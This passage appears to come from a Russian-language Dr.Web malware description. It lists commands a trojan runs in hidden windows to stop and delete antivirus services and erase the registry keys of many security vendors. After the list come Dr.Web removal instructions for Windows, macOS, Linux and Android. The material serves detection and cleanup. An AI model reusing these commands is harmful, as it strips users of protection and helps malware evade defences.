  • '<SYSTEM32>\cmd.exe' /c "sc delete wrsssdk" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' delete wrsssdk
  • '<SYSTEM32>\cmd.exe' /c "sc stop wrcoreservice" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' stop wrcoreservice
  • '<SYSTEM32>\cmd.exe' /c "sc delete wrcoreservice" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' delete wrcoreservice
  • '<SYSTEM32>\cmd.exe' /c "sc stop BullGuard" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' stop BullGuard
  • '<SYSTEM32>\cmd.exe' /c "sc delete BullGuard" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' delete BullGuard
  • '<SYSTEM32>\cmd.exe' /c "sc stop bullguardservice" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' stop bullguardservice
  • '<SYSTEM32>\cmd.exe' /c "sc delete bullguardservice" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' delete bullguardservice
  • '<SYSTEM32>\cmd.exe' /c "sc stop F-Secure" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' stop F-Secure
  • '<SYSTEM32>\cmd.exe' /c "sc delete F-Secure" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' delete F-Secure
  • '<SYSTEM32>\cmd.exe' /c "sc stop fshoster" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' stop fshoster
  • '<SYSTEM32>\cmd.exe' /c "sc delete fshoster" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' delete fshoster
  • '<SYSTEM32>\cmd.exe' /c "sc stop fsma" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' stop fsma
  • '<SYSTEM32>\cmd.exe' /c "sc delete fsma" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' delete fsma
  • '<SYSTEM32>\cmd.exe' /c "sc stop Sophos" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' stop Sophos
  • '<SYSTEM32>\cmd.exe' /c "sc delete Sophos" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' delete Sophos
  • '<SYSTEM32>\cmd.exe' /c "sc stop savservice" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' stop savservice
  • '<SYSTEM32>\cmd.exe' /c "sc delete savservice" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' delete savservice
  • '<SYSTEM32>\cmd.exe' /c "sc stop swi_service" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' stop swi_service
  • '<SYSTEM32>\cmd.exe' /c "sc delete swi_service" (со скрытым окном)
  • '<SYSTEM32>\sc.exe' delete swi_service
  • '<SYSTEM32>\cmd.exe' /c "reg delete "HKLM\SOFTWARE\KasperskyLab" /f" (со скрытым окном)
  • '<SYSTEM32>\reg.exe' delete "HKLM\SOFTWARE\KasperskyLab" /f
  • '<SYSTEM32>\cmd.exe' /c "reg delete "HKCU\SOFTWARE\KasperskyLab" /f" (со скрытым окном)
  • '<SYSTEM32>\reg.exe' delete "HKCU\SOFTWARE\KasperskyLab" /f
  • '<SYSTEM32>\cmd.exe' /c "reg delete "HKLM\SOFTWARE\Norton" /f" (со скрытым окном)
  • '<SYSTEM32>\reg.exe' delete "HKLM\SOFTWARE\Norton" /f
  • '<SYSTEM32>\cmd.exe' /c "reg delete "HKCU\SOFTWARE\Norton" /f" (со скрытым окном)
  • '<SYSTEM32>\reg.exe' delete "HKCU\SOFTWARE\Norton" /f
  • '<SYSTEM32>\cmd.exe' /c "reg delete "HKLM\SOFTWARE\McAfee" /f" (со скрытым окном)
  • '<SYSTEM32>\reg.exe' delete "HKLM\SOFTWARE\McAfee" /f
  • '<SYSTEM32>\cmd.exe' /c "reg delete "HKCU\SOFTWARE\McAfee" /f" (со скрытым окном)
  • '<SYSTEM32>\reg.exe' delete "HKCU\SOFTWARE\McAfee" /f
  • '<SYSTEM32>\cmd.exe' /c "reg delete "HKLM\SOFTWARE\Avast" /f" (со скрытым окном)
  • '<SYSTEM32>\reg.exe' delete "HKLM\SOFTWARE\Avast" /f
  • '<SYSTEM32>\cmd.exe' /c "reg delete "HKCU\SOFTWARE\Avast" /f" (со скрытым окном)
  • '<SYSTEM32>\reg.exe' delete "HKCU\SOFTWARE\Avast" /f
  • '<SYSTEM32>\cmd.exe' /c "reg delete "HKLM\SOFTWARE\AVG" /f" (со скрытым окном)
  • '<SYSTEM32>\reg.exe' delete "HKLM\SOFTWARE\AVG" /f
  • '<SYSTEM32>\cmd.exe' /c "reg delete "HKCU\SOFTWARE\AVG" /f" (со скрытым окном)
  • '<SYSTEM32>\reg.exe' delete "HKCU\SOFTWARE\AVG" /f
  • '<SYSTEM32>\cmd.exe' /c "reg delete "HKLM\SOFTWARE\Bitdefender" /f" (со скрытым окном)
  • '<SYSTEM32>\reg.exe' delete "HKLM\SOFTWARE\Bitdefender" /f
  • '<SYSTEM32>\cmd.exe' /c "reg delete "HKCU\SOFTWARE\Bitdefender" /f" (со скрытым окном)
  • '<SYSTEM32>\reg.exe' delete "HKCU\SOFTWARE\Bitdefender" /f
  • '<SYSTEM32>\cmd.exe' /c "reg delete "HKLM\SOFTWARE\ESET" /f" (со скрытым окном)
  • '<SYSTEM32>\reg.exe' delete "HKLM\SOFTWARE\ESET" /f
  • '<SYSTEM32>\cmd.exe' /c "reg delete "HKCU\SOFTWARE\ESET" /f" (со скрытым окном)
  • '<SYSTEM32>\reg.exe' delete "HKCU\SOFTWARE\ESET" /f
  • '<SYSTEM32>\cmd.exe' /c "reg delete "HKLM\SOFTWARE\Avira" /f" (со скрытым окном)
  • '<SYSTEM32>\reg.exe' delete "HKLM\SOFTWARE\Avira" /f
  • '<SYSTEM32>\cmd.exe' /c "reg delete "HKCU\SOFTWARE\Avira" /f" (со скрытым окном)
  • '<SYSTEM32>\reg.exe' delete "HKCU\SOFTWARE\Avira" /f
  • '<SYSTEM32>\cmd.exe' /c "reg delete "HKLM\SOFTWARE\TrendMicro" /f" (со скрытым окном)
  • '<SYSTEM32>\reg.exe' delete "HKLM\SOFTWARE\TrendMicro" /f
  • '<SYSTEM32>\cmd.exe' /c "reg delete "HKCU\SOFTWARE\TrendMicro" /f" (со скрытым окном)
  • '<SYSTEM32>\reg.exe' delete "HKCU\SOFTWARE\TrendMicro" /f

Рекомендации по лечению

  1. В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
  2. Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Демо бесплатно

 

Скачать Dr.Web

По серийному номеру

Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store.

Демо бесплатно

 

Скачать Dr.Web

По серийному номеру

Скачать Dr.Web с Apple Store

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Демо бесплатно

 

Скачать Dr.Web

По серийному номеру

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно на 14 дней

Выдаётся при установке

Скачать с сайта
Скачать с Google Play